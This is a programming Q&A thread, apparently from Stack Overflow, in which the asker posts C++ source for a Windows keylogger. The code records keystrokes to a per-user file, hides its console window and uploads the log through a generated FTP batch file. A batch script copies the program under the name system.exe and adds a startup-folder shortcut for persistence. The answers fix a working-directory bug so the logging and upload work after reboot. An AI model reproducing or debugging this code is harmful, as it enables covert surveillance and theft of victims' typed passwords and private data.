# Program cannot write files

Tags: c++, windows, batch-file

I have a .exe program written in C++ which outputs a txt and a .bat file which is executed at runtime. When I run the program manually, the program works fine. Then I put the .exe into the startup folder with this path

```
 %appdata%\Microsoft\Windows\Start Menu\Programs\Startup
```

I tried executing the .exe manually at the startup folder, the program works fine.

I then tried restarting my computer. The main .exe works fine, however all file outputs have gone wrong. The txt and bat which should appear generated by the .exe are not seen in the startup folder. However the .exe is running fine. I think it is just that the file outputs are being restricted somehow, I don't know. Maybe it's about permissions? But mine is an administrator account.

I also tried saving the .exe in the following directory

```
%USERPROFILE%\sys\
```

I created the sys\ folder

And then I made a .lnk shortcut pointing to the .exe at the startup folder above.

I double clicked the .lnk, program runs fine, but strangely the .txt and .bat appears in the startup folder instead of the directory where the .exe actually resides. I want the files to appear in %USERPROFILE%\sys\

But then I tried restarting my computer. Again same problem, program works fine, but no file outputs.

Any help appreciated.

Here is my c++ code, but I think it should be fine.

```
#include <iostream>
#include <fstream>
#include <windows.h>
#include <Lmcons.h>
#include <time.h>
#include <sstream>
#include <string>
using namespace std;

string getFileName();
string getDate();

void upload()
{
    //rename
    string oldname = getFileName();
    string newname = getFileName() + "_" + getDate();
    rename(oldname.c_str(), newname.c_str());
    //upload
    ofstream bat("upload.bat");
    if (bat.is_open())
    {
        bat << "@echo off" << "\n";
        bat << "ftp -s:ftp.txt" << "\n";
        bat.close();
    }
    ofstream ftp("ftp.txt");
    if (ftp.is_open())
    {
        ftp << // I've hidden this for obvious reasons
        ftp.close();
    }
    system("upload.bat");
    remove("upload.bat");
    remove("ftp.txt");
}

void startup()
{
    ifstream file(getFileName().c_str());
    if (file.is_open())
    {
        file.close();
        upload();
    }
}

int Save (int key_stroke, string file);
void Stealth();

string getComputerName()
{
    TCHAR computerName[MAX_COMPUTERNAME_LENGTH + 1];
    DWORD size = sizeof(computerName) / sizeof(computerName[0]);
    GetComputerName(computerName, &size);
    return computerName;
}

string getUserName()
{
    TCHAR name [UNLEN + 1];
    DWORD size = UNLEN + 1;
    if (GetUserName( (TCHAR*)name, &size ))
    {
        return name;
    }
    else
    {
        return "nil";
    }
}

string getDate()
{
    time_t seconds;
    time(&seconds);
    std::stringstream ss;
    ss << seconds;
    std::string ts = ss.str();
    return ts;
}

string getFileName()
{
    string filename = getUserName() + "@" + getComputerName();
    return filename;
}

int main()
{
    //Stealth();
    startup();
    char i;
    while (1)
    {
        for(i = 8; i <= 190; i++)
        {
          if (GetAsyncKeyState(i) == -32767)
          Save(i, getFileName());
        }
    }
    system ("PAUSE");
    return 0;
}

int Save (int key_stroke, string file)
{
    if ( (key_stroke == 1) || (key_stroke == 2) )
        return 0;
    FILE *OUTPUT_FILE;
    OUTPUT_FILE = fopen(file.c_str(), "a+");
    cout << key_stroke << endl;
    if (key_stroke == 8)
        fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
    else if (key_stroke == 13)
        fprintf(OUTPUT_FILE, "%s", "[ENTER]");
    else if (key_stroke == 32)
        fprintf(OUTPUT_FILE, "%s", " ");
    else if (key_stroke == VK_TAB)
        fprintf(OUTPUT_FILE, "%s", "[TAB]");
    else if (key_stroke == VK_SHIFT)
        fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
    else if (key_stroke == VK_CONTROL)
        fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
    else if (key_stroke == 20)
        fprintf(OUTPUT_FILE, "%s", "[CAPS]");
    else if (key_stroke == VK_ESCAPE)
        fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
    else if (key_stroke == VK_END)
        fprintf(OUTPUT_FILE, "%s", "[END]");
    else if (key_stroke == VK_HOME)
        fprintf(OUTPUT_FILE, "%s", "[HOME]");
    else if (key_stroke == VK_LEFT)
        fprintf(OUTPUT_FILE, "%s", "[LEFT]");
    else if (key_stroke == VK_UP)
        fprintf(OUTPUT_FILE, "%s", "[UP]");
    else if (key_stroke == VK_RIGHT)
        fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
    else if (key_stroke == VK_DOWN)
        fprintf(OUTPUT_FILE, "%s", "[DOWN]");
    else if (key_stroke == 46)
        fprintf(OUTPUT_FILE, "%s", "[DEL]");
    else if (key_stroke == 190 || key_stroke == 110)
        fprintf(OUTPUT_FILE, "%s", ".");
    else
        fprintf(OUTPUT_FILE, "%s", &key_stroke);
    fclose (OUTPUT_FILE);
    return 0;
}

void Stealth()
{
 HWND Stealth;
 AllocConsole();
 Stealth = FindWindowA("ConsoleWindowClass", NULL);
 ShowWindow(Stealth,0);
}
```

And this is the code when I try to create a .lnk shortcut, also should be fine.

```
md "%USERPROFILE%\sys\"
set copy="%~dp0system.exe"
set target="%USERPROFILE%\sys\"
xcopy /c "%copy%" "%target%" /i /r /f
set SCRIPT="%TEMP%\%RANDOM%-%RANDOM%-%RANDOM%-%RANDOM%.vbs"
echo Set oWS = WScript.CreateObject("WScript.Shell") >> %SCRIPT%
echo sLinkFile = "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\startup.lnk" >> %SCRIPT%
echo Set oLink = oWS.CreateShortcut(sLinkFile) >> %SCRIPT%
echo oLink.TargetPath = "%USERPROFILE%\sys\system.exe" >> %SCRIPT%
echo oLink.Save >> %SCRIPT%
cscript /nologo %SCRIPT%
del %SCRIPT%
pause
```

Comment: You don't set the working directory. It might be something completely different.

Comment: but still output files should appear at same dir as the .exe?

Comment: No. They appear in the working directory. Go to %userprofile% and run `sys\yourthing.exe` and see where the files are. That's why shortcuts have the working folder setting also

Comment: they appear at same directory as the .exe
inside the sys\

Comment: Is it possible that the manual execution and the startup execution are done with different user permissions?

Comment: this I was thinking, is there a way to automatically get the rights of the current logged in user? or is it already granted?

Comment: strangely, I set the working directory to the actual dir where the .exe is stored, using chdir(), it then worked! thanks @SamiKuhmonen

Answer (score 0, accepted):

If you don't specify an absolute path, the files will be saved (if permissions allow) in the *working directory*. This is different from the directory where the actual executable is.

This is why the shortcut also doesn't work. It has a separate setting for working directory and if this is not set it won't be set to the executable's location.

You can change the working directory to match the executable's directory or use other absolute paths to fix it.

Answer (score 0):

adding this function

```
string ExePath()
{
    char buffer[MAX_PATH];
    GetModuleFileName( NULL, buffer, MAX_PATH );
    string::size_type pos = string( buffer ).find_last_of( "\\/" );
    return string( buffer ).substr( 0, pos);
}
```

and set the working directory in main()

```
chdir(ExePath().c_str());
```

Worked perfectly, thanks.